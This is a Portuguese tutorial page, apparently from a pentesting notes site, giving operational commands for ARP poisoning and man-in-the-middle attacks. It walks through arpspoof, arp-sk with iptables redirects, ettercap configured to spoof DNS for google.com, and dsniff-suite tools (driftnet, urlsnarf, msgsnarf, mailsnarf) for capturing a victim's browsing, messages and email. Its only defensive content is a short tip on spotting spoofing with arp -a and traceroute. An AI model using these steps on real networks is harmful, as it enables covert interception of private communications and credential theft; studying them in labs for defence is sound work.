ARP Poisoning

O ARP (Address Resolution Protocol) é responsável por mapear o IP ao Endereço MAC. A vítima terá sua tabela ARP alterada (modificando ou inserindo valores), associando o IP que a vítima quer acessar com o MAC Address do atacante.

Assim toda vez que a vítima (10.0.0.10) for acessar o host 10.0.0.15, irá mandar informações para o atacante (10.0.0.20). Esse envenenamento deve ser realizado em ambas as máquinas (10.0.0.10 e 10.0.0.15)

Para verificar sua tabela ARP, execute no terminal o comando arp -a.

DICA: Se estiver com algum MAC Address repetido em sua tabela ARP, você está sendo atacado. Outra maneira de saber se está sendo atacado, é executar o comando traceroute <site>. O IP do Gateway deve ser o primeiro da lista e no seu provedor não pode conter outro IP. Atente-se também ao Gateway, se ele estivere repetindo no primeiro e no segundo salto, isso também pode significar um MITM. Caso obedeça esses requisitos, um ataque MITM está sendo executado

IMPORTANTE Antes de realizar um ARP Spoofing, execute antes o comando echo 1 > /proc/sys/net/ipv4/ip_forward, para que as mensagens sejam encaminhadas para os nosso alvos. Se não fizermos isso, as solicitações irão parar na nossa máquina e o fluxo da rede irá parar

Arpspoof

Execute os dois comandos abaixo, cada um em um terminal diferente.

arpspoof -i <interface_rede> -t <ip_vitima> <ip_alvo>
arpspoof -i <interface_rede> -t <ip_alvo> <ip_vitima>

ARP-sk

Configurando Firewall e o redirect

iptables -I FORWARD -i <interface> -o <interface> -j ACCEPT
echo 1 > /proc/sys/net/ipv4/conf/<interface>/send_redirects
iptables -t mangle -A FORWARD -j TTL --ttl-inc 1

Agora digite os comandos abaixo, cada um em um terminal:

arp-sk -w -d <ip-1> -S <ip-2> -D <ip-1>
arp-sk -w -d <ip-2> -S <ip-1> -D <ip-2>

Ettercap (CLI)

Modo CLI

nano /etc/ettercap/etter.conf

Deixe que só o root tenha os acessos. Modifique as linhas para (está no início do arquivo):

ec_uid = 0 # nobody is the default
ec_gid = 0 # nobody is the default

Ainda no mesmo arquivo vá na sessão de linux e procure pela tag:

# if you use iptables
# redir_command_on = ...
# redir_command_off = ...

Descomente as duas linhas do redir e salve o arquivo.

Edite o arquivo para infectarmos o domínio que quisermos:

nano /etc/ettercap/etter.dns

Vá no final do arquivo e digite os sites, o tipo de registro e o seu IP:

*.google.com A 192.168.1.9

Agora execute o comando:

ettercap -Tqi wlan0 -M ARP /// /// -P dns_spoof

EXPLICAÇÃO Tqi = T (só trás ifo), i (interface etho), q (quiet, ou seja, não trás informações e fica sujando a tela com cabeçalhos HTTP por exemplo) -M ARP = Irá utilizar Módulo ARP para envenenamento DNS. Se fosse ping seria -M PING /// /// = Significa todos. Se quiséssemos atacar somente algumas máquinas, seria: //{ip_gateway}/ //{ip_vitima}/ -P dns_spoof = Plugin para ocultar o IP

Depois que a vítima acessar o site google.com, irá ser redirecionado (sem saber, é claro) para a nossa máquina.

Modo GUI

  • Abra o Ettercap em seu modo gráfico (execute em um terminal): ettercap -G

  • Vá no menu Sniff > Uniffied Sniffing

  • Depois selecione a sua placa de rede.

  • Clique no menu Hosts > Scan for Hosts (CTRL + S)

  • Veja os Hosts localizados em Hosts > Host List (CTRL + H)

  • Agora selecione o IP do roteador e depois clique em Add to Target 1

  • Depois clique nos IPs dos alvos e clique em Add to Target 2

  • Vá no menu Mitm > ARP Poisoning

  • Selecione a opção Sniff remote connections e dê OK

  • Agora vá em Start > Start Sniffing

Exibindo Imagens dos Sites

driftnet -i <interface>

Visualizar URL Acessadas

urlsnarf -i <interface>

Intercepta Mensageiros

msgsnarf -i <interface>

Intercepta Programas de E-mail

mailsnarf -i <interface>

msgsnarf

Capturando mensagens de forma genérica

msgsnarf

Capturando mensagens de forma genérica e encaminhando para um arquivo

msgsnarf | tee <file.log>

Capturando mensagens e encaminhando para um arquivo de uma rede em específico

msgsnarf and dst <ip_destino> | tee <file.log>

Capturando mensagens de um host em específico e encaminhando para um arquivo

msgsnarf and src <ip_alvo> or dst <ip_alvo> | tee <file.log>

Colhendo Informações

Utilize o comando arp -a na vítima para ver se o envenenamento funcionou, checando se há algum MAC Address está repetido. Obviamente quando se está fazendo esse tipo de ataque não temos acesso ao terminal do nosso alvo, mas em casos de estudo, podemos fazer isso para certificarmos melhor o nosso ataque.

Agora que já estamos recebendo os dados que passam entre dois hosts, está na hora de pegarmos de fato essas informações.

DICA: Antes de executar os comandos abaixo, vale a pena dar uma olhada no Wireshark ou TCPDump para ver os pacotes que estão chegando em nosso host.

PreviousMITMNextDNS Poisoning

Last updated